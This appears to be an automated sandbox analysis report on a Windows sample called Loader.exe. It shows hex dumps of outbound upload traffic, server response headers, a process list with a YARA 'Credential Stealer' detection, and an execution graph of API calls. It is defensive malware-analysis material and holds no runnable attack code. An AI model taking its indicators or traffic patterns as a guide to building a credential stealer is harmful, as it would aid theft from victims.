                                                                                            2024-11-23 08:49:15 UTC15331OUTData Raw: 01 c3 b5 54 13 ee f7 8f e3 71 65 a3 93 d3 d3 d1 75 fa 13 4a ce 2a 60 a7 63 04 44 90 db 87 a7 5a 06 12 55 94 14 23 e2 7e bd 3f 71 4c 3e d2 c0 a9 cb 10 e7 77 5c 85 cf 8f 97 af d6 d5 c1 3d 6a 2c fb f5 2e 83 c0 7f 57 cd 7a 5a e0 55 09 0f 8f e6 e7 11 8f 45 f3 0b ad 29 f5 2d 09 ed 6c 92 d3 7e b5 51 fb 28 8e 20 87 12 da 83 33 79 a8 bb 24 5e a9 f2 4a 30 b5 e5 4e 68 ed 9e fc 49 b9 7e fe ef ea 59 93 57 46 7f 9f 8d be 9a 1e b2 8f ef 6e 90 68 1f b5 d9 f0 79 63 34 ec 2f fe 4b b1 76 2a 84 1f fd 93 d9 bd ee 74 c5 ef 51 a6 21 a2 33 4b 34 2b b7 45 56 68 7d 38 f6 d8 10 d4 1d b5 25 f2 74 47 81 4a 3a 4b 79 82 97 2e 92 21 f1 82 1d 2c 9a 2e c6 1c df 9c e5 76 bf e7 e8 b7 9a e0 3d f4 7f ed 30 6d ed a4 3f 28 81 f8 17 65 17 af cf db 8c 44 0a 10 8e 86 da 50 ae e4 6b 0c e8 f1 fb 49
                                                                                            Data Ascii: TqeuJ*`cDZU#~?qL>w\=j,.WzZUE)-l~Q( 3y$^J0NhI~YWFnhyc4/Kv*tQ!3K4+EVh}8%tGJ:Ky.!,.v=0m?(eDPkI
                                                                                            2024-11-23 08:49:15 UTC15331OUTData Raw: 72 60 e3 45 bf 40 4f 66 c5 e7 91 9a 8a 97 ff b0 98 dc fc d8 d3 d5 53 2b 7f 9c 98 d4 e6 73 42 5d 63 3f b7 7e 53 7d 8d dd 6d 5e 71 ae 7d da 9f 49 cd db 0b 1c 85 8b 00 e6 d6 69 e0 78 61 07 cf 4e 9d 5e d9 42 61 96 db b0 04 ab f4 40 1b 87 a3 8e 0f b7 f9 ba fe e8 5e 84 d5 84 dc 64 81 34 90 8d 09 b9 e5 35 0f d1 ed 42 ed 0d 3e a8 e3 67 7a df 90 db 4c 9e 86 5b 68 01 87 8f bf 36 10 1f 61 0a 3c e4 ff bf 23 d0 91 cc 51 08 94 a1 a1 26 03 70 ad 2c 17 11 59 12 91 9a a5 28 70 21 e4 a9 36 df 1a 5d 5c 15 fb ea 95 e2 90 d6 0f 40 d8 43 74 c4 3c c3 12 bf 4c ba 7a 70 03 8b 9f 18 46 a9 a0 40 e2 47 4e 88 4d 84 4d 62 a8 61 93 55 69 10 6d 7c b6 71 c1 d5 80 75 97 ee 7a e3 a6 71 ef 8c e1 5a 1f 31 26 72 30 47 80 7e 46 06 46 13 7c ce ba 70 6b 14 a8 ce e6 0c 24 15 d0 2a ba 5d b5 d0 45
                                                                                            Data Ascii: r`E@OfS+sB]c?~S}m^q}IixaN^Ba@^d45B>gzL[h6a<#Q&p,Y(p!6]\@Ct<LzpF@GNMMbaUim|quzqZ1&r0G~FF|pk$*]E
                                                                                            2024-11-23 08:49:15 UTC15331OUTData Raw: 4c 25 cc 09 79 35 bf c7 8c 65 24 9a da 13 ff 8d 44 a0 a9 a1 62 7b a4 b1 f3 28 4f b4 79 3b ca dc 49 e3 d7 65 fc 4b bf ad f7 20 ba e3 5c 00 ab 0f 41 62 19 01 4c df 74 ba cd 9a 99 dd 79 72 f5 04 e7 9a 01 1e 3f a5 1b fc 55 32 10 cb 83 11 c6 f4 2a 8c a3 19 51 45 dd 46 73 b2 1f ac 19 4d c6 d8 70 a1 46 79 2b f7 4c a7 a4 d1 91 f1 3b 33 43 15 f1 9b 2f 05 28 fc 9c 3b a3 c1 d8 7a 52 ed 75 26 33 e2 ef 41 72 9d 44 a4 71 1d 82 1d 08 93 28 47 5d 22 d2 fa d0 8c b8 72 f5 74 f8 1e df d2 53 3e 15 c9 64 4b fb 8c 04 9c 90 e0 7e 46 c9 9e 5d 3a 5c d2 77 59 d3 1b cf 24 22 0f f3 99 54 fd 58 69 d2 ba b9 9a d9 ba c5 1d d6 a4 83 11 02 af 07 d4 c6 b3 de 70 81 3f 5f c7 9e 44 d6 18 e9 66 25 f0 0a 81 db 13 d0 e2 39 d3 cc 04 d1 d8 e7 0b e7 12 d8 3f be af e1 9a f2 57 d5 c8 62 7f 8e 73 9b
                                                                                            Data Ascii: L%y5e$Db{(Oy;IeK \AbLtyr?U2*QEFsMpFy+L;3C/(;zRu&3ArDq(G]"rtS>dK~F]:\wY$"TXip?_Df%9?Wbs
                                                                                            2024-11-23 08:49:15 UTC15331OUTData Raw: b6 64 99 5e d1 d1 14 cf b9 22 2c fe e3 6f 6e 87 2b f6 0e 1c e4 0f 9d c0 84 fa a3 7e 2c e0 62 b3 ea 4c 68 e6 61 13 21 12 9c f9 27 81 95 5e ac 04 95 6b e3 60 d9 37 bd a2 30 7b b7 0c 6c 88 81 5f 72 b1 eb a3 44 07 db 5e 9d 25 56 d7 77 4b d8 5e 78 e1 c5 d3 ff 1d a6 b9 9e 81 bd c3 25 2d 42 7f 85 d8 89 aa 32 91 54 d8 66 ac 56 94 65 b7 ae 56 fb 0c 65 a8 fb 61 de eb 83 fb b3 cf 5c 40 df 5c 63 9c d9 99 29 72 15 ba 49 55 d7 5c 46 cf a2 97 73 66 6c 8e 92 e9 ac 25 55 da 18 00 6f d1 8c 79 56 1f 29 4d 04 10 f6 88 45 29 71 b3 1b b6 d7 06 ff 5d 97 1c a9 61 76 4e fd 4c 90 3b ee 0c ef 03 0d 2a 3b fb 1d 66 5b 20 0c 38 24 c5 90 6f 80 a9 61 97 b8 c0 03 71 86 1e 22 ed ee 5e df f7 7e 6b f6 6e 13 93 2a c4 de f8 b5 55 49 cb f2 8b 37 59 7a e2 ca ee 99 1c fc db b3 70 1d 0f 58 54 e5
                                                                                            Data Ascii: d^",on+~,bLha!'^k`70{l_rD^%VwK^x%-B2TfVeVea\@\c)rIU\Fsfl%UoyV)ME)q]avNL;*;f[ 8$oaq"^~kn*UI7YzpXT
                                                                                            2024-11-23 08:49:15 UTC15331OUTData Raw: f5 fc e3 58 bc cb 9d c0 6f 47 1e 2d 6d 65 7a 19 ef 13 d9 f0 72 14 50 a8 ee 79 e9 8d 29 1a be 8c c3 23 be ff 4e c7 8e 15 2f 98 93 f8 bf 6e b6 23 ea 80 b4 53 95 d1 cd 6c f3 54 df 27 0e ae fc 93 ba 23 d6 99 07 51 24 08 13 4a 7b ec 91 63 f3 b5 10 98 7d 16 0a 11 e5 b2 94 21 47 e1 de 93 1c ad 73 69 dc 7b 3d e8 98 3e bc cb 45 62 20 ef fd 48 8b b6 4d cd 5a d1 2c 0f b9 92 35 cd cc 11 ea 14 0d 77 91 2c 8e a8 3e 02 2c 46 33 35 50 df b1 bd 7f 69 c3 15 0d 57 71 90 5a 03 36 f6 6a 64 39 64 ed 68 2f 01 78 6a 9c 20 e2 50 08 9e 55 ec 9c 9d 25 32 c9 3a 3c f8 fd 0a a5 72 d7 6d 25 e6 c8 04 cb 52 2c 0b 1b f6 f3 57 ab ff ef 02 5f e6 61 66 49 f1 31 e1 85 cb 31 99 3a 18 e3 f3 64 5f de 59 99 38 43 71 2c 47 1a 7a 3d 12 37 5b 1c 23 ae 3a 10 66 9c a4 ea c9 41 b4 89 1c 65 a1 4d 6d a9
                                                                                            Data Ascii: XoG-mezrPy)#N/n#SlT'#Q$J{c}!Gsi{=>Eb HMZ,5w,>,F35PiWqZ6jd9dh/xj PU%2:<rm%R,W_afI11:d_Y8Cq,Gz=7[#:fAeMm
                                                                                            2024-11-23 08:49:15 UTC15331OUTData Raw: 11 94 e1 b0 b7 f4 52 b1 5c ca 88 cb a9 4d 69 84 e7 b2 73 a6 71 13 fa 14 22 34 12 eb 85 54 a7 ae 66 a7 ee 7a 83 01 2e e7 d7 e5 58 f1 ce 78 f9 e0 ef be b0 36 be 38 e9 9b ef 50 fe b5 a9 0c 96 de 8e bd 2c 22 a3 09 dd 24 ab 88 60 2a f6 1a 24 6c 54 71 08 f7 72 4c f7 f7 8f 44 51 14 46 6f ad 92 2b 8f 73 f4 ea ab b9 29 ff 80 1e 45 48 c3 e8 98 d6 4a f5 b2 87 b5 25 4e 4c 64 58 7d 4a 08 e7 f6 f1 27 17 58 95 0e 4e 1d c9 3d 12 9a 7c e4 e4 f9 7f a7 cd 58 a4 75 d1 1d 76 44 c9 37 b6 d8 b6 59 b9 a8 95 9e d3 50 46 b6 4f e2 ce 8b 4b d3 86 a3 9f ec a0 cf 3c 4f e0 b3 58 30 2f dc 97 7e 0e 68 2d 1c 20 96 20 10 47 79 37 65 fb af a4 0d 60 01 39 1c 3a c7 07 ca ad dc 7f 79 bb 9f 7c 02 3a 8f 70 62 6c d2 22 f2 4f dd f2 20 3a 35 38 fa 65 55 a0 67 08 a7 f2 d5 a6 38 13 68 97 63 4d 4b d9
                                                                                            Data Ascii: R\Misq"4Tfz.Xx68P,"$`*$lTqrLDQFo+s)EHJ%NLdX}J'XN=|XuvD7YPFOK<OX0/~h- Gy7e`9:y|:pbl"O :58eUg8hcMK
                                                                                            2024-11-23 08:49:15 UTC15331OUTData Raw: 9a 02 40 02 2b 95 ea 9e a7 46 58 d0 d3 33 42 1f bd db a0 3f 74 62 c0 37 fd 49 6b f7 e7 87 f9 66 82 bc 5b f3 f6 9f 8c a8 ff bb 25 26 08 42 7c 16 17 d1 40 1b 7f 05 07 de a2 0b 05 50 c3 64 b2 e4 3f c1 69 da 3e 89 9b c7 6a 2c 8d f9 7d 75 10 0c 18 70 82 9c 23 4b ed 45 d1 03 1c 0a 95 86 b9 92 87 fb a5 46 5c e3 b1 23 aa 74 01 8c 36 cb 33 9a 1a 0c f0 eb 8f 59 63 2b 80 4f c5 7c f0 b8 c8 9b ad b8 7d d3 56 68 5e 3b 1f 3e 33 67 aa e6 c4 a9 cd 67 15 a9 c6 bc 82 63 e2 f7 20 d8 a8 5b 7f fd 8a 83 04 ea 7a c2 04 04 6e 10 70 0d b8 7a e5 a8 90 dd 54 7e 00 e1 a0 15 e2 de d0 9d 5c bb d6 9c 59 b2 8b 8d a9 d3 08 f6 b2 25 de 03 f3 1a 9d 44 48 3a 58 63 8c 4e da 44 14 e0 b6 cf e6 24 d0 05 04 7e 4d d9 14 da d8 da 06 66 ee 8d 2d ff e2 b5 a5 4c ad 47 50 ac 4f 66 f9 f8 28 2e 41 a5 76
                                                                                            Data Ascii: @+FX3B?tb7Ikf[%&B|@Pd?i>j,}up#KEF\#t63Yc+O|}Vh^;>3ggc [znpzT~\Y%DH:XcND$~Mf-LGPOf(.Av
                                                                                            2024-11-23 08:49:15 UTC15331OUTData Raw: d1 84 33 fc d7 24 05 1d e7 f5 69 02 5f ed ff ef a5 37 d6 71 7a 27 33 21 3e 26 b1 6c a7 21 2f f3 ae 9a 97 20 e2 8d 59 f4 58 63 22 60 d8 1d 05 f9 87 67 54 a0 fc 5f 66 4c 77 87 e1 8b 57 bf 88 56 ee bc 59 cc d6 40 40 e4 17 d7 d4 d3 de ac ab f9 e1 8c 84 fc a5 9a 09 97 29 78 a2 b6 89 54 81 56 17 b0 6c dd 11 7a 14 86 61 6a 50 8c 5a a1 29 ce db fd fa 72 91 4a ca 04 80 9d 1c bd e3 fc 8d 21 df d9 81 9e 1e d2 07 5c e7 0f 8c d6 84 f7 dc 16 70 0c 5a 78 35 6f af 42 6c a1 67 79 0c 56 ca 0d 96 dc 75 c9 17 5b 18 08 93 8a f4 6e 56 ee 18 5b 2a d6 a6 47 51 eb 66 3d f2 42 10 ee 05 8c fd b9 3e f6 8a 30 08 f1 9e 9b 95 87 c3 fc a0 d7 9a 49 13 1f f6 a4 c0 a2 8e 9f a8 92 ac d9 be 0a ee 7b c9 20 a7 dd 64 1b 96 c7 08 b4 fe 5c d3 85 e2 3d aa a6 a2 0d 32 02 26 cf 3c 5b 1e dd 38 f6 1d
                                                                                            Data Ascii: 3$i_7qz'3!>&l!/ YXc"`gT_fLwWVY@@)xTVlzajPZ)rJ!\pZx5oBlgyVu[nV[*GQf=B>0I{ d\=2&<[8
                                                                                            2024-11-23 08:49:18 UTC1017INHTTP/1.1 200 OK
                                                                                            Date: Sat, 23 Nov 2024 08:49:17 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=pnaaa8lh5c9l6l6ougaipfvduo; expires=Wed, 19-Mar-2025 02:35:56 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=laKP9d6efD1h36GVDP4U8np0UEwiPWoYabWWu9GOM1KJzZ5hdbbeuRwcpkNlKRmiCazYXkxhAZmutaCeIAJgk38gwpyD9MCGJ7LjDH%2BLgdGS1OGcDocxKiyS7uBPhOfadX63uAY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e6fe7ab4fed42e8-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1731&sent=329&recv=569&lost=0&retrans=0&sent_bytes=2846&recv_bytes=552160&delivery_rate=1652518&cwnd=250&unsent_bytes=0&cid=ffeaba1fd58e28e3&ts=2211&x=0"


                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:03:48:57
                                                                                            Start date:23/11/2024
                                                                                            Path:C:\Users\user\Desktop\Loader.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                            Imagebase:0xe50000
                                                                                            File size:500'224 bytes
                                                                                            MD5 hash:0E6FCE268473AAD13DA6AA0C2E93EC94
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:1
                                                                                            Start time:03:48:57
                                                                                            Start date:23/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:03:48:57
                                                                                            Start date:23/11/2024
                                                                                            Path:C:\Users\user\Desktop\Loader.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                            Imagebase:0xe50000
                                                                                            File size:500'224 bytes
                                                                                            MD5 hash:0E6FCE268473AAD13DA6AA0C2E93EC94
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1730285852.000000000377D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:4.1%
                                                                                              Dynamic/Decrypted Code Coverage:0.5%
                                                                                              Signature Coverage:3.7%
                                                                                              Total number of Nodes:1560
                                                                                              Total number of Limit Nodes:24
                                                                                              execution_graph 8760 e656e2 8761 e656ee ___scrt_is_nonwritable_in_current_image 8760->8761 8786 e6508f 8761->8786 8763 e656f5 8764 e6584e 8763->8764 8772 e6571f ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 8763->8772 8827 e65444 IsProcessorFeaturePresent 8764->8827 8766 e65855 8767 e6585b 8766->8767 8831 e66ed5 8766->8831 8834 e66eeb 8767->8834 8771 e6573e 8772->8771 8775 e657bf 8772->8775 8810 e66f1f 8772->8810 8797 e67a56 8775->8797 8776 e657c5 8801 e5cd90 8776->8801 8781 e657ea 8782 e657f3 8781->8782 8818 e66f01 8781->8818 8821 e650c8 8782->8821 8787 e65098 8786->8787 8837 e65200 IsProcessorFeaturePresent 8787->8837 8791 e650a9 8792 e650ad 8791->8792 8847 e66a60 8791->8847 8792->8763 8795 e650c4 8795->8763 8798 e67a5f 8797->8798 8799 e67a64 8797->8799 8919 e67b7f 8798->8919 8799->8776 9601 e5ce30 8801->9601 8808 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 8809 e5ce24 8808->8809 8816 e653ec GetModuleHandleW 8809->8816 8811 e66f35 ___scrt_is_nonwritable_in_current_image __dosmaperr 8810->8811 8811->8775 8812 e6a00a _unexpected 48 API calls 8811->8812 8815 e6847c 8812->8815 8813 e6835d __FrameHandler3::FrameUnwindToState 48 API calls 8814 e684a6 8813->8814 8815->8813 8817 e653f8 8816->8817 8817->8766 8817->8781 9988 e67020 8818->9988 8822 e650d4 8821->8822 8826 e650ea 8822->8826 10061 e66a72 8822->10061 8824 e650e2 8825 e660ca ___scrt_uninitialize_crt 7 API calls 8824->8825 8825->8826 8826->8771 8828 e6545a __FrameHandler3::FrameUnwindToState std::bad_exception::bad_exception 8827->8828 8829 e65505 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8828->8829 8830 e65550 __FrameHandler3::FrameUnwindToState 8829->8830 8830->8766 8832 e67020 __FrameHandler3::FrameUnwindToState 21 API calls 8831->8832 8833 e66ee6 8832->8833 8833->8767 8835 e67020 __FrameHandler3::FrameUnwindToState 21 API calls 8834->8835 8836 e65863 8835->8836 8838 e650a4 8837->8838 8839 e660ab 8838->8839 8856 e69706 8839->8856 8842 e660b4 8842->8791 8844 e660bc 8845 e660c7 8844->8845 8870 e69742 8844->8870 8845->8791 8910 e6b105 8847->8910 8850 e660ca 8851 e660d3 8850->8851 8852 e660dd 8850->8852 8853 e68811 ___vcrt_uninitialize_ptd 6 API calls 8851->8853 8852->8792 8854 e660d8 8853->8854 8855 e69742 ___vcrt_uninitialize_locks DeleteCriticalSection 8854->8855 8855->8852 8857 e6970f 8856->8857 8859 e69738 8857->8859 8860 e660b0 8857->8860 8874 e6dc17 8857->8874 8861 e69742 ___vcrt_uninitialize_locks DeleteCriticalSection 8859->8861 8860->8842 8862 e687de 8860->8862 8861->8860 8891 e6db28 8862->8891 8865 e687f3 8865->8844 8868 e6880e 8868->8844 8871 e6974d 8870->8871 8873 e6976c 8870->8873 8872 e69757 DeleteCriticalSection 8871->8872 8872->8872 8872->8873 8873->8842 8879 e6dca9 8874->8879 8877 e6dc4f InitializeCriticalSectionAndSpinCount 8878 e6dc3a 8877->8878 8878->8857 8880 e6dc31 8879->8880 8881 e6dcca 8879->8881 8880->8877 8880->8878 8881->8880 8882 e6dd32 GetProcAddress 8881->8882 8884 e6dd23 8881->8884 8886 e6dc5e LoadLibraryExW 8881->8886 8882->8880 8884->8882 8885 e6dd2b FreeLibrary 8884->8885 8885->8882 8887 e6dc75 GetLastError 8886->8887 8888 e6dca5 8886->8888 8887->8888 8889 e6dc80 ___vcrt_FlsFree 8887->8889 8888->8881 8889->8888 8890 e6dc96 LoadLibraryExW 8889->8890 8890->8881 8892 e6dca9 ___vcrt_FlsFree 5 API calls 8891->8892 8893 e6db42 8892->8893 8894 e6db5b TlsAlloc 8893->8894 8895 e687e8 8893->8895 8895->8865 8896 e6dbd9 8895->8896 8897 e6dca9 ___vcrt_FlsFree 5 API calls 8896->8897 8898 e6dbf3 8897->8898 8899 e68801 8898->8899 8900 e6dc0e TlsSetValue 8898->8900 8899->8868 8901 e68811 8899->8901 8900->8899 8902 e6881b 8901->8902 8903 e68821 8901->8903 8905 e6db63 8902->8905 8903->8865 8906 e6dca9 ___vcrt_FlsFree 5 API calls 8905->8906 8907 e6db7d 8906->8907 8908 e6db95 TlsFree 8907->8908 8909 e6db89 8907->8909 8908->8909 8909->8903 8911 e6b115 8910->8911 8912 e650b6 8910->8912 8911->8912 8914 e6a732 8911->8914 8912->8795 8912->8850 8918 e6a739 8914->8918 8915 e6a77c GetStdHandle 8915->8918 8916 e6a7de 8916->8911 8917 e6a78f GetFileType 8917->8918 8918->8915 8918->8916 8918->8917 8920 e67b88 8919->8920 8924 e67b9e 8919->8924 8920->8924 8925 e67ac0 8920->8925 8922 e67b95 8922->8924 8942 e67c8d 8922->8942 8924->8799 8926 e67acc 8925->8926 8927 e67ac9 8925->8927 8951 e6a880 8926->8951 8927->8922 8932 e67add 8934 e6b0cb __freea 14 API calls 8932->8934 8933 e67ae9 8978 e67bab 8933->8978 8936 e67ae3 8934->8936 8936->8922 8938 e6b0cb __freea 14 API calls 8939 e67b0d 8938->8939 8940 e6b0cb __freea 14 API calls 8939->8940 8941 e67b13 8940->8941 8941->8922 8947 e67cfe 8942->8947 8949 e67c9c 8942->8949 8943 e6d131 WideCharToMultiByte ___scrt_uninitialize_crt 8943->8949 8944 e6b807 __dosmaperr 14 API calls 8944->8949 8945 e67d02 8946 e6b0cb __freea 14 API calls 8945->8946 8946->8947 8947->8924 8949->8943 8949->8944 8949->8945 8949->8947 8950 e6b0cb __freea 14 API calls 8949->8950 9386 e6d304 8949->9386 8950->8949 8952 e67ad2 8951->8952 8953 e6a889 8951->8953 8957 e6d22d GetEnvironmentStringsW 8952->8957 9000 e6a0c5 8953->9000 8958 e6d245 8957->8958 8959 e67ad7 8957->8959 8960 e6d131 ___scrt_uninitialize_crt WideCharToMultiByte 8958->8960 8959->8932 8959->8933 8961 e6d262 8960->8961 8962 e6d277 8961->8962 8963 e6d26c FreeEnvironmentStringsW 8961->8963 8964 e6bc45 15 API calls 8962->8964 8963->8959 8965 e6d27e 8964->8965 8966 e6d286 8965->8966 8967 e6d297 8965->8967 8968 e6b0cb __freea 14 API calls 8966->8968 8969 e6d131 ___scrt_uninitialize_crt WideCharToMultiByte 8967->8969 8970 e6d28b FreeEnvironmentStringsW 8968->8970 8971 e6d2a7 8969->8971 8970->8959 8972 e6d2b6 8971->8972 8973 e6d2ae 8971->8973 8975 e6b0cb __freea 14 API calls 8972->8975 8974 e6b0cb __freea 14 API calls 8973->8974 8976 e6d2b4 FreeEnvironmentStringsW 8974->8976 8975->8976 8976->8959 8979 e67bc0 8978->8979 8980 e6b807 __dosmaperr 14 API calls 8979->8980 8981 e67be7 8980->8981 8982 e67bef 8981->8982 8991 e67bf9 8981->8991 8983 e6b0cb __freea 14 API calls 8982->8983 8999 e67af0 8983->8999 8984 e67c56 8985 e6b0cb __freea 14 API calls 8984->8985 8985->8999 8986 e6b807 __dosmaperr 14 API calls 8986->8991 8987 e67c65 9376 e67b50 8987->9376 8991->8984 8991->8986 8991->8987 8993 e67c80 8991->8993 8996 e6b0cb __freea 14 API calls 8991->8996 9367 e696ac 8991->9367 8992 e6b0cb __freea 14 API calls 8995 e67c72 8992->8995 9382 e67d96 IsProcessorFeaturePresent 8993->9382 8998 e6b0cb __freea 14 API calls 8995->8998 8996->8991 8997 e67c8c 8998->8999 8999->8938 9001 e6a0d0 9000->9001 9002 e6a0d6 9000->9002 9004 e69b90 __dosmaperr 6 API calls 9001->9004 9003 e69bcf __dosmaperr 6 API calls 9002->9003 9023 e6a0dc 9002->9023 9005 e6a0f0 9003->9005 9004->9002 9006 e6b807 __dosmaperr 14 API calls 9005->9006 9005->9023 9009 e6a100 9006->9009 9008 e6a0e1 9025 e6acc3 9008->9025 9011 e6a11d 9009->9011 9012 e6a108 9009->9012 9014 e69bcf __dosmaperr 6 API calls 9011->9014 9013 e69bcf __dosmaperr 6 API calls 9012->9013 9015 e6a114 9013->9015 9016 e6a129 9014->9016 9021 e6b0cb __freea 14 API calls 9015->9021 9017 e6a13c 9016->9017 9018 e6a12d 9016->9018 9020 e6a31c __dosmaperr 14 API calls 9017->9020 9019 e69bcf __dosmaperr 6 API calls 9018->9019 9019->9015 9022 e6a147 9020->9022 9021->9023 9024 e6b0cb __freea 14 API calls 9022->9024 9023->9008 9047 e6835d 9023->9047 9024->9008 9026 e6aced 9025->9026 9191 e6ab4f 9026->9191 9029 e6ad06 9029->8952 9032 e6ad1f 9034 e6b0cb __freea 14 API calls 9032->9034 9033 e6ad2d 9205 e6a94a 9033->9205 9034->9029 9037 e6ad65 9038 e6b757 __strnicoll 14 API calls 9037->9038 9040 e6ad6a 9038->9040 9039 e6adac 9042 e6adf5 9039->9042 9216 e6b07e 9039->9216 9043 e6b0cb __freea 14 API calls 9040->9043 9041 e6ad80 9041->9039 9044 e6b0cb __freea 14 API calls 9041->9044 9046 e6b0cb __freea 14 API calls 9042->9046 9043->9029 9044->9039 9046->9029 9056 e6b1bc 9047->9056 9050 e68377 IsProcessorFeaturePresent 9053 e68362 9050->9053 9051 e66eeb __FrameHandler3::FrameUnwindToState 21 API calls 9051->9053 9053->9047 9053->9050 9053->9051 9055 e68839 9053->9055 9059 e6b1e3 9053->9059 9086 e67dca 9053->9086 9092 e6883a 9053->9092 9106 e6b43f 9056->9106 9062 e6b1ef ___scrt_is_nonwritable_in_current_image 9059->9062 9060 e6a15b __dosmaperr 14 API calls 9068 e6b220 __FrameHandler3::FrameUnwindToState 9060->9068 9061 e6b23f 9064 e6b757 __strnicoll 14 API calls 9061->9064 9062->9060 9062->9061 9063 e6b251 __FrameHandler3::FrameUnwindToState 9062->9063 9062->9068 9065 e6b287 __FrameHandler3::FrameUnwindToState 9063->9065 9120 e68161 EnterCriticalSection 9063->9120 9066 e6b244 9064->9066 9070 e6b2c4 9065->9070 9071 e6b3c1 9065->9071 9082 e6b2f2 9065->9082 9117 e67d69 9066->9117 9068->9061 9068->9063 9085 e6b229 9068->9085 9070->9082 9121 e6a00a GetLastError 9070->9121 9074 e6b3cc 9071->9074 9152 e68178 LeaveCriticalSection 9071->9152 9076 e66eeb __FrameHandler3::FrameUnwindToState 21 API calls 9074->9076 9078 e6b3d4 9076->9078 9079 e6a00a _unexpected 48 API calls 9083 e6b347 9079->9083 9081 e6a00a _unexpected 48 API calls 9081->9082 9148 e6b36d 9082->9148 9084 e6a00a _unexpected 48 API calls 9083->9084 9083->9085 9084->9085 9085->9053 9087 e67de6 __FrameHandler3::FrameUnwindToState std::bad_exception::bad_exception 9086->9087 9088 e67e12 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9087->9088 9091 e67ee3 __FrameHandler3::FrameUnwindToState 9088->9091 9090 e67f01 9090->9053 9175 e64241 9091->9175 9093 e68846 GetLastError 9092->9093 9094 e68843 9092->9094 9183 e6db9e 9093->9183 9094->9053 9097 e688c0 SetLastError 9097->9053 9098 e6dbd9 ___vcrt_FlsSetValue 6 API calls 9099 e68874 _unexpected 9098->9099 9100 e6889c 9099->9100 9101 e6dbd9 ___vcrt_FlsSetValue 6 API calls 9099->9101 9105 e6887a 9099->9105 9102 e6dbd9 ___vcrt_FlsSetValue 6 API calls 9100->9102 9103 e688b0 9100->9103 9101->9100 9102->9103 9188 e683ac 9103->9188 9105->9097 9107 e6b44b ___scrt_is_nonwritable_in_current_image 9106->9107 9112 e68161 EnterCriticalSection 9107->9112 9109 e6b459 9113 e6b49b 9109->9113 9112->9109 9116 e68178 LeaveCriticalSection 9113->9116 9115 e6b1e1 9115->9053 9116->9115 9153 e6809f 9117->9153 9120->9065 9122 e6a020 9121->9122 9123 e6a026 9121->9123 9125 e69b90 __dosmaperr 6 API calls 9122->9125 9124 e69bcf __dosmaperr 6 API calls 9123->9124 9127 e6a02a SetLastError 9123->9127 9126 e6a042 9124->9126 9125->9123 9126->9127 9129 e6b807 __dosmaperr 14 API calls 9126->9129 9131 e6a0bf 9127->9131 9132 e6a0ba 9127->9132 9130 e6a057 9129->9130 9133 e6a070 9130->9133 9134 e6a05f 9130->9134 9135 e6835d __FrameHandler3::FrameUnwindToState 46 API calls 9131->9135 9132->9081 9137 e69bcf __dosmaperr 6 API calls 9133->9137 9136 e69bcf __dosmaperr 6 API calls 9134->9136 9138 e6a0c4 9135->9138 9146 e6a06d 9136->9146 9139 e6a07c 9137->9139 9140 e6a097 9139->9140 9141 e6a080 9139->9141 9143 e6a31c __dosmaperr 14 API calls 9140->9143 9144 e69bcf __dosmaperr 6 API calls 9141->9144 9142 e6b0cb __freea 14 API calls 9142->9127 9145 e6a0a2 9143->9145 9144->9146 9147 e6b0cb __freea 14 API calls 9145->9147 9146->9142 9147->9127 9149 e6b371 9148->9149 9150 e6b339 9148->9150 9174 e68178 LeaveCriticalSection 9149->9174 9150->9079 9150->9083 9150->9085 9152->9074 9154 e680b1 __strnicoll 9153->9154 9159 e67f12 9154->9159 9160 e67f22 9159->9160 9161 e67f29 9159->9161 9162 e68030 __strnicoll 16 API calls 9160->9162 9163 e68076 __strnicoll GetLastError SetLastError 9161->9163 9166 e67f37 9161->9166 9162->9161 9164 e67f5e 9163->9164 9165 e67d96 __strnicoll 11 API calls 9164->9165 9164->9166 9167 e67f8e 9165->9167 9168 e67fd7 9166->9168 9169 e67fe3 9168->9169 9170 e67ffa 9169->9170 9171 e68013 __strnicoll 48 API calls 9169->9171 9172 e67d75 9170->9172 9173 e68013 __strnicoll 48 